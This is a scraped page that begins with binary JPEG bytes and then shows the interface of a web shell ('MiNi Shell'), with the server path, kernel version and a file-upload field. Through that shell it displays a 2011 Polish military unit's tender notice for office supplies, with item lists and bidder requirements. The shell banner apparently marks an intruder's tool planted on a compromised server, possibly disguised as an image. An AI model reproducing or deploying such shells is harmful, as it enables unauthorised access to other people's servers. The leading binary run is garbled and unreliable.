JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110518/141627-N-2011.html

<p class="kh_header"><b>Koszalin: POSTĘPOWANIE W TRYBIE  PRZETARGU NIEOGRANICZONEGO PONIZEJ 125 000 EURO  NA DOSTAWĘ MATERIAŁÓW BIUROWYCH DLA JEDNOSTKI WOJSKOWEJ 1223 W KOSZALINIE
Sprawa nr 1-WYSZK-2011</b><br>
<b>Numer ogłoszenia: 141627 - 2011; data zamieszczenia: 18.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 1223 , ul. 4 Marca 5, 75-901 Koszalin, woj. zachodniopomorskie, tel. 094 3456260, faks 094 3456545.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: OBRONA NARODOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> POSTĘPOWANIE W TRYBIE  PRZETARGU NIEOGRANICZONEGO PONIZEJ 125 000 EURO  NA DOSTAWĘ MATERIAŁÓW BIUROWYCH DLA JEDNOSTKI WOJSKOWEJ 1223 W KOSZALINIE
Sprawa nr 1-WYSZK-2011.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów biurowych na potrzeby JW 1223 w Koszalinie zgodnie z poniżej przedstawionymi zadaniami 


1.1. Zadanie nr 1 - materiały biurowe dla JW. 1223 Koszalin 

L.P.	NAZWA, CECHY, PRZEZNACZENIE PRZEDMIOTU
ZAMÓWIENIA	ILOŚĆ	J.M.	KOD CPV
1.	1	Sznurek DRATEW-opakowanie a,250g.stilonowy szewski nabłyszczany biały lub czarny	20	szt	39541130-6

2	Kalka techniczna rolka szer. 110x20 mb 90-95 	10	op	30199130-0
3	Kalka techniczna A-4 opak po 100 szt	5	op	30199130-0
4	Brystol biały, format 70x100, wysoka białość kartonu, minimalna gramatura minimum 450g-m2	200	szt	30194320-4
5	Papier ksero, format A-3 gramatura 80 g-m2, białość CIE 161 lub wyższa, ryza 500 arkuszy	40	ryz	30197644-2
6	Papier ksero, format A-4 gramatura 80 g-m2, kolorowy, ryza 500 arkuszy w minimum 5 kolorach (miks kolorów)	25	ryz	30197644-2
7	Papier ksero, format A-4 gramatura 80 g-m2, kolorowy, ryza 500 arkuszy	25	ryz	30197644-2
8	Papier ploter o szer 914mm x 50 m gramatura 80 g-m2 lub wyższa 	6	op	30197644-2
9	Papier ploter o szer 914mm x 50 m gramatura 80 g-m2 lub wyższa kolor błękitny	3	op	30197644-2

10	Pudło archiwizacyjne Boxy -do przechowywania dokumentów grzbiet 200mm wymiary 350x200x250mm	60	szt	44617100-9
11	Karton wizytówkowy A-4, biały, opakowanie 25 arkuszy, różne faktury, gramatura minimum 246g-m2	20	ryz	30199300-3
12	Koperta biała C-4 samoprzylepne	4000	szt	30199230-1
13	Koperta biała, format C6, samoprzylepna z paskiem 	2000	szt	30199230-1
14	Koperta biała, format C5, samoprzylepna z paskiem typu HK. 	4000	szt	30199230-1
15	Papier samoprzylepny biały A-4	1000	szt	30199410-7
16	Papier samoprzylepny kolor A-4 (żółty, czerwony, zielony, niebieski)	1000	szt	30199410-7
17	Brulion 300 kart A-4 oprawa twarda introligatorska	20	szt	22830000-7
18	Brulion 200 kart A-4 twarda okładka	40	szt	22830000-7
19	Brulion 160 kart A-5 twarda okładka	50	szt	22830000-7
20	Brulion 192 kart B-5 twarda okładka	50	szt	22830000-7
21	Podkładka z zaciskiem, format A-4 (Klip zamykany A-4)	30	szt	30191130-4
22	Okładka do bindowania -tył (opak po 100 szt)- różne kolory,skóropodobna typu Delta,200gm2	30	op	33198100-5
23	Skoroszyt papierowy A-4	500	szt	22851000-0
24	Teczka do podpisu, minimum 16 przegródek, grzbiet harmonijkowy, na pierwszej okładce okienko do opisania zawartości	4	szt	22851000-0
25	Teczka na gumkę - A-4 kartonowa - różne kolory 	200	szt	22850000-3
26	Teczka wiązana 	500	szt	22850000-3
27	Zeszyt 32 kart A-5	500	szt	22830000-7
28	Zeszyt 60 kart A-5	200	szt	22830000-7
29	Zeszyt 96 kart A-5 twarda okładka	500	szt	22830000-7
30	Zeszyt 96 kart A-4 twarda okładka	500	szt	22830000-7
31	Tusz do stempli w plastikowych pojemnikach 30ml - niebieski-50,czerwony-15 i czarny-15	80	szt	22600000-6
32	Klej biurowy typu PRIT min 50 g w płynie z kulką metalową	400	szt	24910000-6
33	Klej butapren 0,2 puzszka	50	szt	24910000-6
34	Klej butapren 0,8 puszka 	30	szt	24910000-6
35	Klej wikol 0,2 kg	20	szt	24910000-6
36	Folia przezroczysta o grubości do 1 mm x 100mb x szer min 3m	2	rolka	30194220-3
37	Folia do laminowania A-4 100mat antystatyczna, grubość pojedynczej folii 125 mic, opakowanie 100 arkuszy obustronnie matowa	15	op	30192910-3
38	Folia do laminowania A-4, antystatyczna, grubość pojedynczej folii 125 mic, opakowanie 100 arkuszy	20	op	30192910-3
39	Folia do laminowania A-3, antystatyczna, grubość pojedynczej folii 125 mic, opakowanie 100 arkuszy	5	op	30192910-3
40	Folia okładki do bindowania  po 100 szt różne kolory	30	op	30192910-3
41	Folia samoprzylepna - szer 1 m	50	m	30192910-3
42	Linijka plastikowa 50 cm, wykonana z trwałego i odpornego na ścieranie tworzywa	100	szt	39292500-0
43	Obwoluta A-5 do segregatora, wykonana z mocnej folii, opakowanie 100 sztuk	100	op	30192000-1
44	Podkład na biurko duży z zasobnikami na przybory piśmiennicze	20	szt	30193000-8
45	Pojemnik na biurko z jeżem duży o wymiarach  dł.22,5xszer.16,7 wys5 cm z plexi, wielokomorowy	25	szt	30193000-8
46	Spinacze biurowe owalny 	300	op	30190000-7
47	Taśma pakowa, brązowa lub przeźroczysta, rozmiar minimalny 48mm x 66	30	szt	44424200-0
48	Taśma nylonowa biało-czerwona 100m na rolce	40	szt	44424200-0
49	Taśma dwustronna piankowa 30mm x 5m	50	szt	44424200-0
50	Taśma klejąca biurowa, przeźroczysta 18mm x 20m	400	szt	44424200-0
51	Półka na dokumenty(Szuflada na dokumenty przezroczysta)	40	szt	30193000-8
52	Identyfikator -holder z klipsem metalowym CT 211 do włożenia  karty magnetycznej o grubości do 
2 mm	500	szt	30191140-7
53	Identyfikator kieszonka dla służb 57x90 mm	50	szt	30191140-7
54	Pinezki srebrne, opakowanie min 50 szt	100	op	30197100-7
55	Pinezki do tablic korkowych, różne kolory, typu beczułki, op.min 25 szt.	100	op	30197100-7
56	Nożyczki 21cm, wykonane z wysokiej jakości stali, rączki wykonane z tworzywa, typu LACO lub równoważne	70	szt	39241200-5
57	Nożyk łamany z blokadą ostrza 18mm	80	szt	39241000-3
58	Blok biurowy 50 kart A-4	50	szt	37823500-8
59	Blok techniczny A-4	50	szt	37823500-8
60	Cienkopis, z końcówka fibrową wzmocnioną metalową obudową, ergonomiczna obudowa o trójkątnym przekroju, system DRY SAFE - umożliwiający pozostawienie bez skuwki do kilku dni. Cienkopisy typu Staedtler lub równoważne	800	szt	30192123-9
61	Datownik, samotuszujący, 8 cyfrowy, typu  Trodat lub równoważny	10	szt	30192150-7
62	Długopis -automatyczny, metalowy, grubość linii pisania 0,32 mm, długość linii pisania 1600 m- wymienny wkład olejowy	1000	szt	30192121-5
63	Wkład do długopisu  -poz  Nr.68	1000	szt	30192121-5
64	Długopis żelowy, automatyczny, umożliwiający pisanie po obu stronach papieru komputerowego, podwójny mechanizm chowania wkładu, tusz pigmentowy, wodoodporny, typu UNI UMN 152 lub równoważny	380	szt	30192121-5
65	Wkład do długopisu żelowego -poz  Nr.64	400	szt	30192121-5
66	Naboje długie do piór wiecznych (WATERMAN),opak. Po 8 szt kolor czarny i niebieski	24	szt	30125100-2
67	Dziurkacz dziurkujący jednorazowo minimum 40 kartek o gramaturze 80gm2, wykonany z metalu z plastikową nakładką oraz ogranicznikiem formatu	40	szt	30197330-8
68	Dziurkacz archiwistyczny z 4 ostrzami na min 360 kart-typu HP4-360	2	szt	30197330-8
69	Foliopis typu Staedtler, rózne grubości (M, S, F, B), różne 4 kolory lub równoważne	800	szt	30192123-9
70	Grzbiet do bindowania okrągły 6mm, różne kolory	200	szt	30192000-1
71	Grzbiet do bindowania okrągły 10mm, różne kolory	200	szt	30192000-1
72	Grzbiet do bindowania okrągły 15 mm, różne kolory	200	szt	30192000-1
73	Grzbiet do bindowania okrągły 20 mm, różne kolory	200	szt	30192000-1
74	Gumka do stosowania na papierze i folii, nie naruszające struktury wymazywanej powierzchni, nie zostawiająca żadnych śladów, minimalne wymiary: 60x20x10 mm.Gumki typu combi z niebieską częścią, służącą do wycierania atramentu z papieru.	400	szt	30192100-2
75	Korektor w płynie-szybkoschnący poj min 20ml	50	szt	30192930-9
76	Korektor - myszka  typu Pritt, nietoksyczny, nie zawierający rozpuszczalników, odporny na światło, do precyzyjnego korygowania pisma ręcznego, maszynowego oraz komputerowego lub równoważne 	50	szt	30192930-9
77	Korektor w piórze z met końcówką	100	szt	30192930-9
78	Polecenie wyjazdu służbowego 	100	bloczki	22900000-9
79	Kostka - notes 85x85 mm, klejona po jednej z krawędzi, biała lub kolorowa, 500 karteczek	200	szt	22816300-6
80	Kostka - notes samoprzylepny 75x75 mm, różne intensywne kolory, 100 karteczek w bloczku, możliwość wielokrotnego odklejania i przyklejania, typu POST IT lub równoważne	200	szt	22816300-6
81	Listwa GRIPPA A-4 rozmiar 3 kolor szary lub czarny	200	szt	30192000-1
82	Listwa GRIPPA A-4 rozmiar 6 kolor szary lub czarny	200	szt	30192000-1
83	Listwa GRIPPA A-4 rozmiar 9 kolor szary lub czarny	200	szt	30192000-1
84	Listwa GRIPPA A-4 rozmiar 11 kolor szary lub czarny	200	szt	30192000-1
85	Listwa GRIPPA A-4 rozmiar 15 kolor szary lub czarny	200	szt	30192000-1
86	Marker permanentny, okrągła lub ścięta końcówka, metalowa obudowa, różne kolory, możliwość wielokrotnego napełniania, typu Pilot MID F-B lub równoważne -4 kolory	800	szt	30192124-6
87	Marker do tablic suchościeralnych, komplet - 4 sztuki markerów, każdy w innym kolorze oraz gąbka, markery wyposażone w tłoczek dozujący, typu Pentel Maxiflox  lub równoważne	30	szt	30192124-6
88	Ołówek automatyczny, gumowy uchwyt metalowy klips, przycisk do wysuwania grafitów na wysokości uchwytu dłoni typu Pentel PD 305T	350	szt	30192131-8
89	Ołówek  wykonany z żywicy syntetycznej, bezdrzewny, niełamliwy grafiti typu Bic 	450	szt	30192131-8
90	Plastelina 12 kol	100	op	30192000-1
91	Płyn do tablic suchościeralnych a-250ml z rozpylaczem	30	szt	30192000-1
92	Poduszka do stempli 70*110mm (wkład materiałowy)	12	szt	30192111-2
93	Segregator A4 50 mm-75mm, wyposażony w mechanizm dźwigniowy, oklejony na zewnątrz i wewnątrz folią PCV w różnych kolorach, krawędź zabezpieczona metalową szyna, otwór na palec, wymienne etykiety	300	szt	30199500-5
94	Segregator A5 50 mm-75mm, wyposażony w mechanizm dźwigniowy, oklejony na zewnątrz i wewnątrz folią PCV w różnych kolorach, krawędź zabezpieczona metalową szyna, otwór na palec, wymienne etykiety	50	szt	30199500-5
95	Temperówka metalowa  	100	szt	30192133-2
96	Zakreślasz, intensywny atrament pigmentowy, nie rozmazujący się na wszelkiego rodzaju wydrukach, zakreślacze każdy w innym kolorze(4 podstawowe kolory minimum), typu Staedtler lub równoważne	800	szt	30192124-6
97	Zszywacz zszywający minimum 30 kartek o gramaturze 80 gm2, mocna metalowa obudowa i mechanizm	30	szt	30197320-5
98	Zszywacz długoramienny typu LEITZ - łatwy do ustawienia format zszywania od A6 do A2, skala calowa i milimetrowa	2	szt	30197320-5
99	Zszywacz zszywający od 120- 200 kartek o gramaturze 80 gm2, mocna metalowa obudowa i mechanizm	2	szt	30197320-5
100	Zszywacz tapicerski	4	szt	30197320-5
101	Zszywki 24-6 - opakowanie 1000 szt	500	op	30197100-7
102	Zszywki tapicerskie opak po - 2500 szt do zszywacza z poz 80	300	op	30197100-7
103	Rozszywacz	50	szt	30197321-2
104	Kredki 12 kolorów (klasy STAEDTLER) w opakowaniu metalowym lub plastikowym	20	op	37822100-7
105	Klips biurowy metalowy - rozmiar 25  ( opak po 12 szt)	10	op	30197000-6
106	Klips biurowy metalowy - rozmiar 32   ( opak po 12 szt)	10	op	30197000-6
107	Klips biurowy metalowy - rozmiar 41   ( opak po 12 szt)	10	op	30197000-6
108	Pojemnik na Dekofleks Plus z plexi, wielokomorowy	8	szt	30193700-5
109	Dekofleks Plus- teczki zawieszane z identyfikatorami(kolor czrny,niebieski, czerwony,zółty)	200	szt	39132300-9
110	Wąsy do skoroszytów opak po 25 szt	10	op	39264000-0
111	Kreda biała tablicowa	55	op	44922100-0
112	Rysiki - grafiti 0,5 opak min po 12szt, twardość 
( H, 2H,HB, B,2B -po 200 opak każdego)	120	op	30192132-5
	

	

1.2. Zadanie nr 2 - materiały biurowe dla PŻW Koszalin 
L.P.	NAZWA I CECHY PRZEDMIOTU
ZAMÓWIENIA	ILOŚĆ	J.M.	KOD CPV
1.	Koperta biała samoprzylepna z paskiem C6144 X 162(op po 50szt.)	2	op. 	30199230-1
2.	Koperta biała samoprzylepna z paskiem C-5162 X 229(op po 500szt.) 	1	op. 	30199230-1
3.	Koperta biała samoprzylepna z paskiem C - 4229 X 324( op po 250 szt.)	3	op. 	30199230-1
4.	Koperta brązowa samoprzylepna z paskiem C-4 229 X 324(op po 250 szt)	2	op. 	30199230-1
5.	Koperta z rozszerzonym bokiem brązowa  E - 4 280x400x40(op po 250 szt.)	1	op. 	30199230-1
6.	Spinacz owalny 	25	op. 	30197220-4
7.	Długopis typu zenith	3	szt.	30197000-6
8.	ołówek	12	szt.	30192130-1
9.	Plastelina	5	op. 	25247100-5
10.	Karteczki samoprzylepne 40x50	25	szt.	30197000-6
11.	koszulka krystaliczna A4	2	op. 	30197000-6
12.	Długopis żelowy G2 PILOT	3	szt.	30197000-6
13.	Wkład żelowy G2 PILOT	10	szt.	30197000-6
14.	PAPIER KSERO A-4 - 500A-4 80 gm2	50	ryz.	30197644-2
15.	PAPIER KSERO A-3 - 500A-3-297-420 80 gm2	1	ryz.	30197644-2
16.	Brystol kolor - format 70x110(100 białego,28 czerwony,25 żółty)	153	szt.	30197644-2


Przedmiot umowy będzie dostarczony transportem Wykonawcy na jego koszt i ryzyko do siedziby Zamawiającego. 
 Zamawiający zastrzega sobie prawo do sprawdzenia dostawy pod względem ilościowym i jakościowym w momencie dostarczenia towaru w obecności przedstawiciela Wykonawcy. Dostawy realizowane będą do poszczególnych magazynów, wskazanych przez Zamawiającego na terenie Jednostki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 39.54.11.30-6, 30.19.91.30-0, 30.19.43.20-4, 30.19.76.44-2, 44.61.73.00-1, 30.19.93.00-3, 30.19.92.30-1, 30.19.94.10-7, 22.83.00.00-7, 30.19.29.10-3, 30.19.20.00-1, 30.19.30.00-8, 30.19.21.21-5, 30.19.73.30-8, 22.90.00.00-9, 30.19.70.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust.1 (z wykorzystaniem wzoru - załącznik nr 3 do SIWZ)

2)	Oświadczenie o braku podstaw do wykluczenia ( z wykorzystaniem wzoru zawartego w        załączniku 4 do SIWZ)
3)	Aktualny odpis z właściwego rejestru , jeżeli odrębne przepisy wymagają wpisu do rejestru        wystawiony (lub uaktualniony) przez odpowiedni,  uprawniony do ich wystawienia organ, nie       wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4)	Oświadczenie, że wykonawca nie zalega z opłacaniem podatków lub, że uzyskał zgodę na 
zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (z wykorzystaniem  wzoru zawartego w załączniku nr 5 do SIWZ); 
5)	Oświadczenie, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (z wykorzystaniem  wzoru zawartego w załączniku nr 6 do SIWZ);
6)	Zamawiający żąda, aby wykonawca do wniosku o dopuszczenie do udziału w postępowaniu dołączył dokument, lub dokumenty z których będzie wynikać uprawnienie do podpisania oferty np.:aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub  aktualny rejestr handlowy ( Wymagane dokumenty można złożyć w formie kopii poświadczonej z oryginałem przez Wykonawcę).
Opis  sposobu dokonywania oceny tych warunków:

Ocena wyżej wymienionych warunków zostanie dokonana na podstawie załączonych przez Wykonawcę dokumentów. Zamawiający uzna warunki za spełnione w przypadku gdy Wykonawca dostarczy komplet żądanych dokumentów zgodnie z wymaganiami niniejszej  SIWZ.
Zamawiający dokona oceny spełnienia powyższych warunków zgodnie z formułą spełnia-nie spełnia a informacje o dokonanej ocenie zostaną umieszczone w protokole postępowania o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
